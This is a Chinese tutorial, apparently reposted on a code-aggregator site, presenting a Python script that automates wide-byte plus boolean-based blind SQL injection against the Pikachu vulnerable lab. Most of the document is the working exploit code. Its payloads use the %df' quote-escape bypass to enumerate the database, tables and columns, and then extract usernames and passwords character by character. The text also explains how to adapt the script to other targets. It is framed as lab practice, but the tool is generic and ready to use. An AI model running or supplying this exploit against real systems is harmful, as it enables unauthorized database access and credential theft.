python实现sql宽字节注入+布尔盲注_python

概述目录一、注意点二、代码三、使用1、获取（简单方法）（复杂方法）2、使用四、测试一、注意点本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的，代码中的payload和参数都基于此，使用本文代码需要修改payload和部分参数，具体见代码注释比起单纯的布尔盲注，宽字节注入+布尔盲

一、注意点

二、代码

三、使用

1、获取

（简单方法）

（复杂方法）

2、使用

四、测试

一、注意点

本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的，代码中的payload和参数都基于此，使用本文代码需要修改payload和部分参数，具体见代码注释

比起单纯的布尔盲注，宽字节注入+布尔盲注需要注意以下几点：

（1）payload中布尔运算符后面的语句不能包含单引号等会被转义的特殊字符

（2）requests模块方法的入参必须写成字符串形式，不能是字典形式（原因是字典形式的参数会被requests模块自动进行url编码）

（3）http头必须包含"Content-Type":"application/x-www-form-urlencoded" （原因也是如果没有这个头，requests模块就会自动对参数进行url编码）

二、代码

以下代码可自用，未经许可不能转载

#!/usr/bin/python3# Coding=utf-8"""functions for boolean-based wIDe byte sql injection(blind):copyright: copyright (c) 2021, Fancy Xiang. All rights reserved.:license: GNU General Public license v3.0, see liCENSE for more details."""import requestsurl = "http://192.168.101.16/pikachu/vul/sqli/sqli_wIDebyte.PHP"               #有可利用漏洞的url，根据实际情况填写headers={     "User-Agent": "Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",    "cookie": "PHPSESSID=7qgjcq21lsq834acodn0mo7km3",    "Content-Type":"application/x-www-form-urlencoded"    #本行必须包括，否则requests模块自动进行url编码    }    #http request报文头部，根据实际情况填写 keyList = range(33, 127)                                     #包括数字、大小写字母、可见特殊字符flag = 'your uID'                                                              #用于判断附加SQL语句为真的字符，根据网页回显填写def CurrentDatabaseWIDe():    n = 10                                                                      #预测当前数据库名称最大可能的长度，根据实际情况填写    k = 0    j = n//2     length = 0    db = str()    while True:        if j>k and j<n and j-k>3:            payload1 = "name=lili%df' or length(database())>"+str(j)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"           #所有payload根据实际情况填写，必须是字符串形式            response = requests.post(url, data = payload1, headers = headers)     #本脚本根据POST型注入编写，遇到其他类型可修改方法和参数，其他所有函数中同样            #print(response.request.headers)            #print(response.request.body)            if response.text.find(flag) != -1:                n=n                k=j            else:                k=k                n=j            j=(n-k)//2        elif j-k==3 or j-k<3:            for i in range(k-1,n+2):                payload2 = "name=lili%df' or length(database())="+str(i)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"                param = {                "name":payload2,                "submit":"查询",                }                response = requests.post(url, data = payload2, headers = headers)                if response.text.find(flag) != -1:                    length = i                    break            break        else:            break    print("the name of current database contains "+str(length)+" characters")        for i in range(1,length+1):        for c in keyList:            payload3 = "name=lili%df' or ascii(substring(database(),"+str(i)+",1))="+str(c)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"            response = requests.post(url, data = payload3, headers = headers)            if response.text.find(flag) != -1:                db = db+chr(c)                break    print("the name of current database is "+str(db))    def tablesWIDe():    n = 100                                                                     #预测当前数据库中所有表名称最大可能的长度，根据实际情况填写    k = 0    j = n//2    length = 0    tname = str()    while True:        if j>k and j<n and j-k>3:            payload4 = "name=lili%df' or (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"            response = requests.post(url, data = payload4, headers = headers)            if response.text.find(flag) != -1:                n=n                k=j            else:                k=k                n=j            j=(n-k)//2        elif j-k==3 or j-k<3:            for i in range(k-1,n+2):                payload5 = "name=lili%df' or (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))="+str(i)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"                response = requests.post(url, data = payload5, headers = headers)                if response.text.find(flag) != -1:                    length = i                    break            break        else:            break    print("the name of all tables in current database contains "+str(length)+" characters")        for i in range(1,length+1):        for c in keyList:            payload6 = "name=lili%df' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database()),"+str(i)+",1))="+str(c)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"            response = requests.post(url, data = payload6, headers = headers)            if response.text.find(flag) != -1:                tname = tname+chr(c)                break    print("the name of all tables in current database is "+str(tname))def ColumnsWIDe():    n = 200                                                                     #预测某个表所有列名称最大可能的长度，根据实际情况填写    k = 0    j = n//2    length = 0    cname = str()    while True:        if j>k and j<n and j-k>3:            payload7 = "name=lili%df' or (length((select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273)))>"+str(j)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"            response = requests.post(url, data = payload7, headers = headers)            if response.text.find(flag) != -1:                n=n                k=j            else:                k=k                n=j            j=(n-k)//2        elif j-k==3 or j-k<3:            for i in range(k-1,n+2):                payload8 = "name=lili%df' or (length((select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273)))="+str(i)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"                response = requests.post(url, data = payload8, headers = headers)                if response.text.find(flag) != -1:                    length = i                    break            break        else:            break    print("the name of all columns in current table contains "+str(length)+" characters")        for i in range(1,length+1):        for c in keyList:            payload9 = "name=lili%df' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 0x7573657273),"+str(i)+",1))="+str(c)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"            response = requests.post(url, data = payload9, headers = headers)            if response.text.find(flag) != -1:                cname = cname+chr(c)                break    print("the name of all columns in current table is "+str(cname))def ContentWIDe():    n = 200                                                                     #预测期望获取的数据的最大可能的长度，根据实际情况填写    k = 0    j = n//2    length = 0    content = str()    while True:        if j>k and j<n and j-k>3:            payload10 = "name=lili%df' or (length((select group_concat(concat(username,0x7e,password)) from users)))>"+str(j)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"            response = requests.post(url, data = payload10, headers = headers)            if response.text.find(flag) != -1:                n=n                k=j            else:                k=k                n=j            j=(n-k)//2        elif j-k==3 or j-k<3:            for i in range(k-1,n+2):                payload11 = "name=lili%df' or (length((select group_concat(concat(username,0x7e,password)) from users)))="+str(i)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"                response = requests.post(url, data = payload11, headers = headers)                if response.text.find(flag) != -1:                    length = i                    break            break        else:            break    print("the content contains "+str(length)+" characters")        for i in range(1,length+1):        for c in keyList:            payload12 = "name=lili%df' or ascii(substr((select group_concat(concat(username,0x7e,password)) from users),"+str(i)+",1))="+str(c)+"-- ss&submit=%E6%9F%A5%E8%AF%A2"            response = requests.post(url, data = payload12, headers = headers)            if response.text.find(flag) != -1:                content = content+chr(c)                break    print("the content is "+str(content))

三、使用1、获取（简单方法）

我的github：

仓库：JacquelinXiang/sqli_blind: A simple tool/framework for boolean-based or time-based sql injection(blind) (github.com)

下载链接：https://github.com/JacquelinXiang/sqli_blind/archive/refs/heads/main.zip

下载链接可以直接添加到各种加速网站，就不用打开github了。

下载下来的文件夹改名为sqli_blind

（复杂方法）

step1、复制上面的代码保存为sqli_bb_wIDebyte.py

step2、复制下面的代码保存为__init__.py

from .sqli_bb_wIDebyte import *

step3、以上两个python文件保存到文件夹sqli_blind中

2、使用

（1）确保安装了python3

（2）根据实际情况修改代码中的payload和部分参数（见注释）

（3）打开命令行，进入sql_blind文件夹的上级目录，输入python进入python3交互界面

（4）输入 from sqli_blind import *导入所有函数，然后调用函数即可，详见测试部分。

注意：每次修改代码需要退出python3交互界面，删除sqli_blind下的__pycache__文件夹，并重新进入python3交互界面from sqli_blind import *

四、测试

总结

以上是内存溢出为你收集整理的python实现sql宽字节注入+布尔盲注全部内容，希望文章能够帮你解决python实现sql宽字节注入+布尔盲注所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错，欢迎将内存溢出网站推荐给程序员好友。

欢迎分享，转载请注明来源：内存溢出

原文地址: http://outofmemory.cn/langs/1186853.html

python实现sql宽字节注入+布尔盲注

发表评论

评论列表（0条）